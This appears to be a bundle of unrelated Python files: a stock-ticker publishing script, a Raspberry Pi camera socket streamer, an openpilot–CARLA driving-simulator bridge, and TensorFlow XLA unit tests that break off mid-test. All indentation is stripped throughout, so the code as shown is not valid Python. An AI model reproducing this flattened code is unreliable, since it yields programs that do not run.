x=numericQuoteElements[random.randrange(len(numericQuoteElements))]
y=current[x][1].strip()
try:
if(len(y)==0):
continue
y=float(y)
if(x==13):
y=int(y)
y+=random.randrange(int(float(y)/10))
else:
y+=(y/30)-random.random()*(y/15)
if y!=13 and y<0:y=-y
if y!=13 and y==0:y=random.randrange(40)
except:
y=None
if not y is None:
current[x]=(current[x][0],str(y))
if x==9:
current[14]=('kn_payload',str(y))
current[17]=('kn_id','%s_%d'%(ticker,time.time()))
dat.append(current)
transmittedData[ticker]=current
totalTransmitted+=1
if len(dat)>KNCONFIG.PUBSUBSERVER_MAXBATCHSIZE:
knr.publish(d=dat)
dat=[]
if len(dat)>0:
knr.publish(d=dat)
print 'finished sendSimulatedData'
#==========================================================================================
# Threads
#==========================================================================================
def thread_getDataFunction():
#global didTransmit
global tickersCount,gotDataException
print 'thread_getDataFunction started'
lastTickersCount=0
while 1:
lastTime=time.time()
sleeptime=0
while 1:
try:
getAllTickerData()
gotDataException=0
break
except:
gotDataException+=1
sleeptime+=5
if sleeptime>20:
sleeptime=20
time.sleep(sleeptime)
print 'Exception opening URL in getData, retrying...'
while (time.time()-lastTime)<NASDAQ_MINSWEEPTIME_NODELTA:
x=max(min(NASDAQ_MINSWEEPTIME_NODELTA-time.time()+lastTime,NASDAQ_MINSWEEPTIME),1)
print 'getData sleeping for %d'%x
time.sleep(x)
#if didTransmit:
# didTransmit=0
# break
if tickersCount!=lastTickersCount:
break
x=(time.time()-lastTime)/NASDAQ_MINSWEEPTIME
if x==3:
print 'getData long sleep'
lastTickersCount=tickersCount
def thread_sendDataFunction():
global gotDataException,sentSimulatedData
print 'thread_sendDataFunction started'
while 1:
lastTime=time.time()
lt=time.localtime()
# NASDAQ open?
x=lt[3]*100+lt[4]
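# x is the local time encoded as HHMM; 930..1600 together with the weekday
# check below approximates regular NASDAQ trading hours.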
if DateTime.today().day_of_week>=5 or x<930 or x>1600 or gotDataException>3 or alwaysSimulate:
sleepTime=NASDAQ_MINSWEEPTIME
sendSimulatedData()
else:
sleepTime=NASDAQ_MINSWEEPTIME/2
sendAllChangedTickerData()
if (time.time()-lastTime)<sleepTime:
time.sleep(max(sleepTime-time.time()+lastTime,1))
#---------------------------------------- START
try:
knr.start()
time.sleep(2)
while 1:
m=knr.subscribe(kn_from=KN_NASDAQ_TOPIC+'/kn_subtopics',cb=newTickerCallback,options={'do_max_age':'infinity'})
if m is None:
print 'Retrying subscription'
else:
print m
break
#knr.publish(d=[('kn_to','/what/foo'),('kn_payload','hello')])
getDataThread=None
sendDataThread=None
lastCount=0
x=0
while knr.connected():
if not getDataThread or not getDataThread.isAlive():
print '(Re)starting getDataThread...'
getDataThread=Thread(target=thread_getDataFunction)
getDataThread.setDaemon(1)
getDataThread.start()
if not sendDataThread or not sendDataThread.isAlive():
print '(Re)starting sendDataThread...'
sendDataThread=Thread(target=thread_sendDataFunction)
sendDataThread.setDaemon(1)
sendDataThread.start()
x+=1
if x>5:
print 'Tickers=%d NumEvents=%d'%(tickersCount,totalTransmitted-lastCount)
lastCount=totalTransmitted
x=0
time.sleep(10)
finally:
knr.stop()
# End of nasdaq.py
|
AutCamera.py
|
import cv2
import numpy as np
import struct
import base64
import socket
import threading
import time
import subprocess
class Camera:
def __init__(self, connect_camera = False, host = '', port = 8089, rotation = None, capture_interval = 1):
"""
A camera object which is used to capture single images from a camera or start a live stream. It uses OpenCV under the hood.
@param connect_camera: If True, a socket connection is opened to the address and sport specified in the constructor
@param host: Defines the name of the host for camera strean. Default is localhost
@param port: Defines the port the camera is using for sending live images. Default to 8089
@param rotation: Defines if camera images should be rotated. Default is none, use -1 for 180 degree rotation
"""
self.__frame = None
self.host = host
self.port = port
self.__rotation = rotation
self.__nosignal = True
self.__proc = threading.Thread(target=self.__listen_socket)
self.__stop_sending = False
self.__capture_interval = capture_interval
# Load Rasperry Pi Cam kernel module bcm2835-v4l2
try:
subprocess.check_call("sudo modprobe bcm2835-v4l2", shell=True)
except Exception as e:
print("Warning: Couldn't load bcm2835-v4l2 kernel module")
self.__cam = cv2.VideoCapture(0)
if(connect_camera):
threading.Thread(target=self.__frame_updater).start()
def get_frame(self):
"""
Returns the current camera frame as byte object
"""
return self.__frame
def read(self):
"""
Returns the frame of the OpenCV VideoCapture buffer
"""
ret, frame = self.__cam.read()
if(self.__rotation != None):
frame = cv2.flip(frame, self.__rotation)
return ret, frame
def __frame_updater(self):
clientsocket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
clientsocket.connect((self.host, self.port))
except Exception as e:
print("Could not connect to remote machine: "+str(e))
self.__nosignal = True
return
data = b""
self.__nosignal = False
payload_size = struct.calcsize("<L")
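# Each frame on the wire is a 4-byte little-endian length prefix followed by a
# base64-encoded JPEG of that length.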
while True:
try:
while len(data) < payload_size:
data += clientsocket.recv(4096)
frame_size = struct.unpack("<L", data[:payload_size])[0]
data = data[payload_size:]
while len(data) < frame_size:
data += clientsocket.recv(16384)
frame_data = data[:frame_size]
data = data[frame_size:]
img = base64.b64decode(frame_data)
npimg = np.frombuffer(img, dtype=np.uint8)
frame = cv2.imdecode(npimg, 1)
#cv2.imwrite("img.jpg", frame)
ret, jpeg = cv2.imencode('.jpg', frame)
self.__frame = jpeg.tobytes()
except (socket.error,socket.timeout) as e:
# The timeout got reached or the client disconnected. Clean up the mess.
print("Cleaning up: ",e)
try:
clientsocket.close()
except socket.error:
pass
self.__nosignal = True
break
def start(self):
"""
Starts a live streaming camera session. Should be called on the device which wants to broadcast
"""
self.__proc.start()
def stop(self):
"""
Stops the camera live stream, closes the socket
"""
self.__stop_sending = True
def __listen_socket(self):
serversocket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
serversocket.bind((self.host, self.port))
serversocket.listen(10)
print('Camera socket now listening on ' + self.host + ":" + str(self.port))
conn, addr = serversocket.accept()
print("New client connection")
last_timestamp = time.time()
while not self.__stop_sending:
ret, frame = self.read()
current_time = time.time()
if(current_time - last_timestamp > self.__capture_interval):
last_timestamp = current_time
frame = cv2.resize(frame,(200, 150))
encoded, buffer = cv2.imencode('.jpg', frame)
b_frame = base64.b64encode(buffer)
b_size = len(b_frame)
# print("Frame size = ", b_size)
try:
conn.sendall(struct.pack("<L", b_size) + b_frame)
except socket.error as e:
print("Socket Error: "+str(e))
self.__stop_sending = True
conn.close()
serversocket.close()
|
bridge.py
|
#!/usr/bin/env python3
import argparse
import math
import os
import signal
import threading
import time
from multiprocessing import Process, Queue
from typing import Any
import carla # pylint: disable=import-error
import numpy as np
import pyopencl as cl
import pyopencl.array as cl_array
import cereal.messaging as messaging
from cereal import log
from cereal.visionipc.visionipc_pyx import VisionIpcServer, VisionStreamType # pylint: disable=no-name-in-module, import-error
from common.basedir import BASEDIR
from common.numpy_fast import clip
from common.params import Params
from common.realtime import DT_DMON, Ratekeeper
from selfdrive.car.honda.values import CruiseButtons
from selfdrive.test.helpers import set_params_enabled
from tools.sim.lib.can import can_function
W, H = 1928, 1208
REPEAT_COUNTER = 5
PRINT_DECIMATION = 100
STEER_RATIO = 15.
pm = messaging.PubMaster(['roadCameraState', 'wideRoadCameraState', 'sensorEvents', 'can', "gpsLocationExternal"])
sm = messaging.SubMaster(['carControl', 'controlsState'])
def parse_args(add_args=None):
parser = argparse.ArgumentParser(description='Bridge between CARLA and openpilot.')
parser.add_argument('--joystick', action='store_true')
parser.add_argument('--high_quality', action='store_true')
parser.add_argument('--town', type=str, default='Town04_Opt')
parser.add_argument('--spawn_point', dest='num_selected_spawn_point', type=int, default=16)
return parser.parse_args(add_args)
class VehicleState:
def __init__(self):
self.speed = 0
self.angle = 0
self.bearing_deg = 0.0
self.vel = carla.Vector3D()
self.cruise_button = 0
self.is_engaged = False
self.ignition = True
def steer_rate_limit(old, new):
# Rate limiting to 0.5 degrees per step
limit = 0.5
if new > old + limit:
return old + limit
elif new < old - limit:
return old - limit
else:
return new
class Camerad:
def __init__(self):
self.frame_road_id = 0
self.frame_wide_id = 0
self.vipc_server = VisionIpcServer("camerad")
# TODO: remove RGB buffers once the last RGB vipc subscriber is removed
self.vipc_server.create_buffers(VisionStreamType.VISION_STREAM_RGB_ROAD, 4, True, W, H)
self.vipc_server.create_buffers(VisionStreamType.VISION_STREAM_ROAD, 5, False, W, H)
self.vipc_server.create_buffers(VisionStreamType.VISION_STREAM_RGB_WIDE_ROAD, 4, True, W, H)
self.vipc_server.create_buffers(VisionStreamType.VISION_STREAM_WIDE_ROAD, 5, False, W, H)
self.vipc_server.start_listener()
# set up for pyopencl rgb to yuv conversion
self.ctx = cl.create_some_context()
self.queue = cl.CommandQueue(self.ctx)
cl_arg = f" -DHEIGHT={H} -DWIDTH={W} -DRGB_STRIDE={W * 3} -DUV_WIDTH={W // 2} -DUV_HEIGHT={H // 2} -DRGB_SIZE={W * H} -DCL_DEBUG "
# TODO: move rgb_to_yuv.cl to local dir once the frame stream camera is removed
kernel_fn = os.path.join(BASEDIR, "selfdrive", "camerad", "transforms", "rgb_to_yuv.cl")
with open(kernel_fn) as f:
prg = cl.Program(self.ctx, f.read()).build(cl_arg)
self.krnl = prg.rgb_to_yuv
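# The kernel is launched with a (W/4, H/4) global work size, so round the
# image dimensions up to multiples of 4 here.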
self.Wdiv4 = W // 4 if (W % 4 == 0) else (W + (4 - W % 4)) // 4
self.Hdiv4 = H // 4 if (H % 4 == 0) else (H + (4 - H % 4)) // 4
def cam_callback_road(self, image):
self._cam_callback(image, self.frame_road_id, 'roadCameraState',
VisionStreamType.VISION_STREAM_RGB_ROAD, VisionStreamType.VISION_STREAM_ROAD)
self.frame_road_id += 1
def cam_callback_wide_road(self, image):
self._cam_callback(image, self.frame_wide_id, 'wideRoadCameraState',
VisionStreamType.VISION_STREAM_RGB_WIDE_ROAD, VisionStreamType.VISION_STREAM_WIDE_ROAD)
self.frame_wide_id += 1
def _cam_callback(self, image, frame_id, pub_type, rgb_type, yuv_type):
img = np.frombuffer(image.raw_data, dtype=np.dtype("uint8"))
img = np.reshape(img, (H, W, 4))
img = img[:, :, [0, 1, 2]].copy()
# convert RGB frame to YUV
rgb = np.reshape(img, (H, W * 3))
rgb_cl = cl_array.to_device(self.queue, rgb)
yuv_cl = cl_array.empty_like(rgb_cl)
self.krnl(self.queue, (np.int32(self.Wdiv4), np.int32(self.Hdiv4)), None, rgb_cl.data, yuv_cl.data).wait()
yuv = np.resize(yuv_cl.get(), np.int32(rgb.size / 2))
eof = int(frame_id * 0.05 * 1e9)
# TODO: remove RGB send once the last RGB vipc subscriber is removed
self.vipc_server.send(rgb_type, img.tobytes(), frame_id, eof, eof)
self.vipc_server.send(yuv_type, yuv.data.tobytes(), frame_id, eof, eof)
dat = messaging.new_message(pub_type)
msg = {
"frameId": image.frame,
"transform": [1.0, 0.0, 0.0,
0.0, 1.0, 0.0,
0.0, 0.0, 1.0]
}
setattr(dat, pub_type, msg)
pm.send(pub_type, dat)
def imu_callback(imu, vehicle_state):
vehicle_state.bearing_deg = math.degrees(imu.compass)
dat = messaging.new_message('sensorEvents', 2)
dat.sensorEvents[0].sensor = 4
dat.sensorEvents[0].type = 0x10
dat.sensorEvents[0].init('acceleration')
dat.sensorEvents[0].acceleration.v = [imu.accelerometer.x, imu.accelerometer.y, imu.accelerometer.z]
# copied these numbers from locationd
dat.sensorEvents[1].sensor = 5
dat.sensorEvents[1].type = 0x10
dat.sensorEvents[1].init('gyroUncalibrated')
dat.sensorEvents[1].gyroUncalibrated.v = [imu.gyroscope.x, imu.gyroscope.y, imu.gyroscope.z]
pm.send('sensorEvents', dat)
def panda_state_function(vs: VehicleState, exit_event: threading.Event):
pm = messaging.PubMaster(['pandaStates'])
while not exit_event.is_set():
dat = messaging.new_message('pandaStates', 1)
dat.valid = True
dat.pandaStates[0] = {
'ignitionLine': vs.ignition,
'pandaType': "blackPanda",
'controlsAllowed': True,
'safetyModel': 'hondaNidec'
}
pm.send('pandaStates', dat)
time.sleep(0.5)
def peripheral_state_function(exit_event: threading.Event):
pm = messaging.PubMaster(['peripheralState'])
while not exit_event.is_set():
dat = messaging.new_message('peripheralState')
dat.valid = True
# fake peripheral state data
dat.peripheralState = {
'pandaType': log.PandaState.PandaType.blackPanda,
'voltage': 12000,
'current': 5678,
'fanSpeedRpm': 1000
}
pm.send('peripheralState', dat)
time.sleep(0.5)
def gps_callback(gps, vehicle_state):
dat = messaging.new_message('gpsLocationExternal')
# transform vel from carla to NED
# north is -Y in CARLA
velNED = [
-vehicle_state.vel.y, # north/south component of NED is negative when moving south
vehicle_state.vel.x, # positive when moving east, which is x in carla
vehicle_state.vel.z,
]
dat.gpsLocationExternal = {
"timestamp": int(time.time() * 1000),
"flags": 1, # valid fix
"accuracy": 1.0,
"verticalAccuracy": 1.0,
"speedAccuracy": 0.1,
"bearingAccuracyDeg": 0.1,
"vNED": velNED,
"bearingDeg": vehicle_state.bearing_deg,
"latitude": gps.latitude,
"longitude": gps.longitude,
"altitude": gps.altitude,
"speed": vehicle_state.speed,
"source": log.GpsLocationData.SensorSource.ublox,
}
pm.send('gpsLocationExternal', dat)
def fake_driver_monitoring(exit_event: threading.Event):
pm = messaging.PubMaster(['driverState', 'driverMonitoringState'])
while not exit_event.is_set():
# dmonitoringmodeld output
dat = messaging.new_message('driverState')
dat.driverState.faceProb = 1.0
pm.send('driverState', dat)
# dmonitoringd output
dat = messaging.new_message('driverMonitoringState')
dat.driverMonitoringState = {
"faceDetected": True,
"isDistracted": False,
"awarenessStatus": 1.,
}
pm.send('driverMonitoringState', dat)
time.sleep(DT_DMON)
def can_function_runner(vs: VehicleState, exit_event: threading.Event):
i = 0
while not exit_event.is_set():
can_function(pm, vs.speed, vs.angle, i, vs.cruise_button, vs.is_engaged)
time.sleep(0.01)
i += 1
def connect_carla_client():
client = carla.Client("127.0.0.1", 2000)
client.set_timeout(5)
return client
class CarlaBridge:
def __init__(self, arguments):
set_params_enabled()
msg = messaging.new_message('liveCalibration')
msg.liveCalibration.validBlocks = 20
msg.liveCalibration.rpyCalib = [0.0, 0.0, 0.0]
Params().put("CalibrationParams", msg.to_bytes())
self._args = arguments
self._carla_objects = []
self._camerad = None
self._exit_event = threading.Event()
self._threads = []
self._keep_alive = True
self.started = False
signal.signal(signal.SIGTERM, self._on_shutdown)
self._exit = threading.Event()
def _on_shutdown(self, signal, frame):
self._keep_alive = False
def bridge_keep_alive(self, q: Queue, retries: int):
try:
while self._keep_alive:
try:
self._run(q)
break
except RuntimeError as e:
self.close()
if retries == 0:
raise
# Reset for another try
self._carla_objects = []
self._threads = []
self._exit_event = threading.Event()
retries -= 1
if retries <= -1:
print(f"Restarting bridge. Error: {e} ")
else:
print(f"Restarting bridge. Retries left {retries}. Error: {e} ")
finally:
# Clean up resources in the opposite order they were created.
self.close()
def _run(self, q: Queue):
client = connect_carla_client()
world = client.load_world(self._args.town)
settings = world.get_settings()
settings.synchronous_mode = True # Enables synchronous mode
settings.fixed_delta_seconds = 0.05
world.apply_settings(settings)
world.set_weather(carla.WeatherParameters.ClearSunset)
if not self._args.high_quality:
world.unload_map_layer(carla.MapLayer.Foliage)
world.unload_map_layer(carla.MapLayer.Buildings)
world.unload_map_layer(carla.MapLayer.ParkedVehicles)
world.unload_map_layer(carla.MapLayer.Props)
world.unload_map_layer(carla.MapLayer.StreetLights)
world.unload_map_layer(carla.MapLayer.Particles)
blueprint_library = world.get_blueprint_library()
world_map = world.get_map()
vehicle_bp = blueprint_library.filter('vehicle.tesla.*')[1]
spawn_points = world_map.get_spawn_points()
assert len(spawn_points) > self._args.num_selected_spawn_point, f'''No spawn point {self._args.num_selected_spawn_point}, try a value between 0 and
{len(spawn_points)} for this town.'''
spawn_point = spawn_points[self._args.num_selected_spawn_point]
vehicle = world.spawn_actor(vehicle_bp, spawn_point)
self._carla_objects.append(vehicle)
max_steer_angle = vehicle.get_physics_control().wheels[0].max_steer_angle
# make tires less slippery
# wheel_control = carla.WheelPhysicsControl(tire_friction=5)
physics_control = vehicle.get_physics_control()
physics_control.mass = 2326
# physics_control.wheels = [wheel_control]*4
physics_control.torque_curve = [[20.0, 500.0], [5000.0, 500.0]]
physics_control.gear_switch_time = 0.0
vehicle.apply_physics_control(physics_control)
transform = carla.Transform(carla.Location(x=0.8, z=1.13))
def create_camera(fov, callback):
blueprint = blueprint_library.find('sensor.camera.rgb')
blueprint.set_attribute('image_size_x', str(W))
blueprint.set_attribute('image_size_y', str(H))
blueprint.set_attribute('fov', str(fov))
if not self._args.high_quality:
blueprint.set_attribute('enable_postprocess_effects', 'False')
camera = world.spawn_actor(blueprint, transform, attach_to=vehicle)
camera.listen(callback)
return camera
self._camerad = Camerad()
road_camera = create_camera(fov=40, callback=self._camerad.cam_callback_road)
road_wide_camera = create_camera(fov=120, callback=self._camerad.cam_callback_wide_road) # fov bigger than 120 shows unwanted artifacts
self._carla_objects.extend([road_camera, road_wide_camera])
vehicle_state = VehicleState()
# reenable IMU
imu_bp = blueprint_library.find('sensor.other.imu')
imu = world.spawn_actor(imu_bp, transform, attach_to=vehicle)
imu.listen(lambda imu: imu_callback(imu, vehicle_state))
gps_bp = blueprint_library.find('sensor.other.gnss')
gps = world.spawn_actor(gps_bp, transform, attach_to=vehicle)
gps.listen(lambda gps: gps_callback(gps, vehicle_state))
self._carla_objects.extend([imu, gps])
# launch fake car threads
self._threads.append(threading.Thread(target=panda_state_function, args=(vehicle_state, self._exit_event,)))
self._threads.append(threading.Thread(target=peripheral_state_function, args=(self._exit_event,)))
self._threads.append(threading.Thread(target=fake_driver_monitoring, args=(self._exit_event,)))
self._threads.append(threading.Thread(target=can_function_runner, args=(vehicle_state, self._exit_event,)))
for t in self._threads:
t.start()
# init
throttle_ease_out_counter = REPEAT_COUNTER
brake_ease_out_counter = REPEAT_COUNTER
steer_ease_out_counter = REPEAT_COUNTER
vc = carla.VehicleControl(throttle=0, steer=0, brake=0, reverse=False)
is_openpilot_engaged = False
throttle_out = steer_out = brake_out = 0.
throttle_op = steer_op = brake_op = 0.
throttle_manual = steer_manual = brake_manual = 0.
old_steer = old_brake = old_throttle = 0.
throttle_manual_multiplier = 0.7 # keyboard signal is always 1
brake_manual_multiplier = 0.7 # keyboard signal is always 1
steer_manual_multiplier = 45 * STEER_RATIO # keyboard signal is always 1
# Simulation tends to be slow in the initial steps. This prevents lagging later
for _ in range(20):
world.tick()
# loop
rk = Ratekeeper(100, print_delay_threshold=0.05)
while self._keep_alive:
# 1. Read the throttle, steer and brake from op or manual controls
# 2. Set instructions in Carla
# 3. Send current carstate to op via can
cruise_button = 0
throttle_out = steer_out = brake_out = 0.0
throttle_op = steer_op = brake_op = 0
throttle_manual = steer_manual = brake_manual = 0.0
# --------------Step 1-------------------------------
if not q.empty():
message = q.get()
m = message.split('_')
if m[0] == "steer":
steer_manual = float(m[1])
is_openpilot_engaged = False
elif m[0] == "throttle":
throttle_manual = float(m[1])
is_openpilot_engaged = False
elif m[0] == "brake":
brake_manual = float(m[1])
is_openpilot_engaged = False
elif m[0] == "reverse":
cruise_button = CruiseButtons.CANCEL
is_openpilot_engaged = False
elif m[0] == "cruise":
if m[1] == "down":
cruise_button = CruiseButtons.DECEL_SET
is_openpilot_engaged = True
elif m[1] == "up":
cruise_button = CruiseButtons.RES_ACCEL
is_openpilot_engaged = True
elif m[1] == "cancel":
cruise_button = CruiseButtons.CANCEL
is_openpilot_engaged = False
elif m[0] == "ignition":
vehicle_state.ignition = not vehicle_state.ignition
elif m[0] == "quit":
break
throttle_out = throttle_manual * throttle_manual_multiplier
steer_out = steer_manual * steer_manual_multiplier
brake_out = brake_manual * brake_manual_multiplier
old_steer = steer_out
old_throttle = throttle_out
old_brake = brake_out
if is_openpilot_engaged:
sm.update(0)
# TODO gas and brake is deprecated
throttle_op = clip(sm['carControl'].actuators.accel / 1.6, 0.0, 1.0)
brake_op = clip(-sm['carControl'].actuators.accel / 4.0, 0.0, 1.0)
steer_op = sm['carControl'].actuators.steeringAngleDeg
throttle_out = throttle_op
steer_out = steer_op
brake_out = brake_op
steer_out = steer_rate_limit(old_steer, steer_out)
old_steer = steer_out
else:
if throttle_out == 0 and old_throttle > 0:
if throttle_ease_out_counter > 0:
throttle_out = old_throttle
throttle_ease_out_counter += -1
else:
throttle_ease_out_counter = REPEAT_COUNTER
old_throttle = 0
if brake_out == 0 and old_brake > 0:
if brake_ease_out_counter > 0:
brake_out = old_brake
brake_ease_out_counter += -1
else:
brake_ease_out_counter = REPEAT_COUNTER
old_brake = 0
if steer_out == 0 and old_steer != 0:
if steer_ease_out_counter > 0:
steer_out = old_steer
steer_ease_out_counter += -1
else:
steer_ease_out_counter = REPEAT_COUNTER
old_steer = 0
# --------------Step 2-------------------------------
steer_carla = steer_out / (max_steer_angle * STEER_RATIO * -1)
steer_carla = np.clip(steer_carla, -1, 1)
steer_out = steer_carla * (max_steer_angle * STEER_RATIO * -1)
old_steer = steer_carla * (max_steer_angle * STEER_RATIO * -1)
vc.throttle = throttle_out / 0.6
vc.steer = steer_carla
vc.brake = brake_out
vehicle.apply_control(vc)
# --------------Step 3-------------------------------
vel = vehicle.get_velocity()
speed = math.sqrt(vel.x ** 2 + vel.y ** 2 + vel.z ** 2) # in m/s
vehicle_state.speed = speed
vehicle_state.vel = vel
vehicle_state.angle = steer_out
vehicle_state.cruise_button = cruise_button
vehicle_state.is_engaged = is_openpilot_engaged
if rk.frame % PRINT_DECIMATION == 0:
print("frame: ", "engaged:", is_openpilot_engaged, "; throttle: ", round(vc.throttle, 3), "; steer(c/deg): ",
round(vc.steer, 3), round(steer_out, 3), "; brake: ", round(vc.brake, 3))
if rk.frame % 5 == 0:
world.tick()
rk.keep_time()
self.started = True
def close(self):
self.started = False
self._exit_event.set()
for s in self._carla_objects:
try:
s.destroy()
except Exception as e:
print("Failed to destroy carla object", e)
for t in reversed(self._threads):
t.join()
def run(self, queue, retries=-1):
bridge_p = Process(target=self.bridge_keep_alive, args=(queue, retries), daemon=True)
bridge_p.start()
return bridge_p
if __name__ == "__main__":
q: Any = Queue()
args = parse_args()
carla_bridge = CarlaBridge(args)
p = carla_bridge.run(q)
if args.joystick:
# start input poll for joystick
from tools.sim.lib.manual_ctrl import wheel_poll_thread
wheel_poll_thread(q)
else:
# start input poll for keyboard
from tools.sim.lib.keyboard_ctrl import keyboard_poll_thread
keyboard_poll_thread(q)
p.join()
|
xla_client_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the Python extension-based XLA client."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import itertools
import threading
import numpy as np
from tensorflow.compiler.xla.python import xla_client
import unittest
class LocalComputationTest(unittest.TestCase):
"""Base class for running an XLA Computation through the local client."""
def _NewComputation(self, name=None):
if name is None:
name = self.id()
return xla_client.ComputationBuilder(name)
def _Execute(self, c, arguments):
compiled_c = c.Build().CompileWithExampleArguments(arguments)
return compiled_c.Execute(arguments)
def _ExecuteAndAssertWith(self, assert_func, c, arguments, expected):
assert expected is not None
result = self._Execute(c, arguments)
# Numpy's comparison methods are a bit too lenient by treating inputs as
# "array-like", meaning that scalar 4 will be happily compared equal to
# [[4]]. We'd like to be more strict so assert shapes as well.
self.assertEqual(np.asanyarray(result).shape, np.asanyarray(expected).shape)
assert_func(result, expected)
def _ExecuteAndCompareExact(self, c, arguments=(), expected=None):
self._ExecuteAndAssertWith(np.testing.assert_equal, c, arguments, expected)
def _ExecuteAndCompareClose(self, c, arguments=(), expected=None):
self._ExecuteAndAssertWith(np.testing.assert_allclose, c, arguments,
expected)
def NumpyArrayF32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float32 dtype."""
return np.array(*args, dtype=np.float32, **kwargs)
def NumpyArrayF64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float64 dtype."""
return np.array(*args, dtype=np.float64, **kwargs)
def NumpyArrayS32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int32 dtype."""
return np.array(*args, dtype=np.int32, **kwargs)
def NumpyArrayS64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int64 dtype."""
return np.array(*args, dtype=np.int64, **kwargs)
def NumpyArrayBool(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.bool dtype."""
return np.array(*args, dtype=np.bool, **kwargs)
class ComputationsWithConstantsTest(LocalComputationTest):
"""Tests focusing on Constant ops."""
def testConstantScalarSumF32(self):
c = self._NewComputation()
root = c.Add(c.ConstantF32Scalar(1.11), c.ConstantF32Scalar(3.14))
self.assertEqual(c.GetShape(root), c.GetReturnValueShape())
self._ExecuteAndCompareClose(c, expected=4.25)
def testConstantScalarSumF64(self):
c = self._NewComputation()
c.Add(c.ConstantF64Scalar(1.11), c.ConstantF64Scalar(3.14))
self._ExecuteAndCompareClose(c, expected=4.25)
def testConstantScalarSumS32(self):
c = self._NewComputation()
c.Add(c.ConstantS32Scalar(1), c.ConstantS32Scalar(2))
self._ExecuteAndCompareClose(c, expected=3)
def testConstantScalarSumS64(self):
c = self._NewComputation()
c.Add(c.ConstantS64Scalar(1), c.ConstantS64Scalar(2))
self._ExecuteAndCompareClose(c, expected=3)
def testConstantVectorMulF32(self):
c = self._NewComputation()
c.Mul(
c.Constant(NumpyArrayF32([2.5, 3.3, -1.2, 0.7])),
c.Constant(NumpyArrayF32([-1.2, 2, -2, -3])))
self._ExecuteAndCompareClose(c, expected=[-3, 6.6, 2.4, -2.1])
def testConstantVectorMulF64(self):
c = self._NewComputation()
c.Mul(
c.Constant(NumpyArrayF64([2.5, 3.3, -1.2, 0.7])),
c.Constant(NumpyArrayF64([-1.2, 2, -2, -3])))
self._ExecuteAndCompareClose(c, expected=[-3, 6.6, 2.4, -2.1])
def testConstantVectorScalarDivF32(self):
c = self._NewComputation()
c.Div(
c.Constant(NumpyArrayF32([1.5, 2.5, 3.0, -10.8])),
c.ConstantF32Scalar(2.0))
self._ExecuteAndCompareClose(c, expected=[0.75, 1.25, 1.5, -5.4])
def testConstantVectorScalarDivF64(self):
c = self._NewComputation()
c.Div(
c.Constant(NumpyArrayF64([1.5, 2.5, 3.0, -10.8])),
c.ConstantF64Scalar(2.0))
self._ExecuteAndCompareClose(c, expected=[0.75, 1.25, 1.5, -5.4])
def testConstantVectorScalarPowF32(self):
c = self._NewComputation()
c.Pow(c.Constant(NumpyArrayF32([1.5, 2.5, 3.0])), c.ConstantF32Scalar(2.))
self._ExecuteAndCompareClose(c, expected=[2.25, 6.25, 9.])
def testConstantVectorScalarPowF64(self):
c = self._NewComputation()
c.Pow(c.Constant(NumpyArrayF64([1.5, 2.5, 3.0])), c.ConstantF64Scalar(2.))
self._ExecuteAndCompareClose(c, expected=[2.25, 6.25, 9.])
def testBooleanAnd(self):
c = self._NewComputation()
c.And(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, False])
def testBooleanOr(self):
c = self._NewComputation()
c.Or(
c.Constant(NumpyArrayBool([True, False, True, False])),
c.Constant(NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[True, True, True, False])
def testSum2DF32(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF32([[1, -1, 1], [-1, 1, -1]])))
self._ExecuteAndCompareClose(c, expected=[[2, 1, 4], [3, 6, 5]])
def testSum2DF64(self):
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6]])),
c.Constant(NumpyArrayF64([[1, -1, 1], [-1, 1, -1]])))
self._ExecuteAndCompareClose(c, expected=[[2, 1, 4], [3, 6, 5]])
def testSum2DWith1DBroadcastDim0F32(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([10, 20, 30])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[11, 12, 13], [24, 25, 26], [37, 38, 39]])
def testSum2DWith1DBroadcastDim0F64(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF64([10, 20, 30])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareClose(
c, expected=[[11, 12, 13], [24, 25, 26], [37, 38, 39]])
def testSum2DWith1DBroadcastDim1F32(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([10, 20, 30])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[11, 22, 33], [14, 25, 36], [17, 28, 39]])
def testSum2DWith1DBroadcastDim1F64(self):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
c.Add(
c.Constant(NumpyArrayF64([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF64([10, 20, 30])),
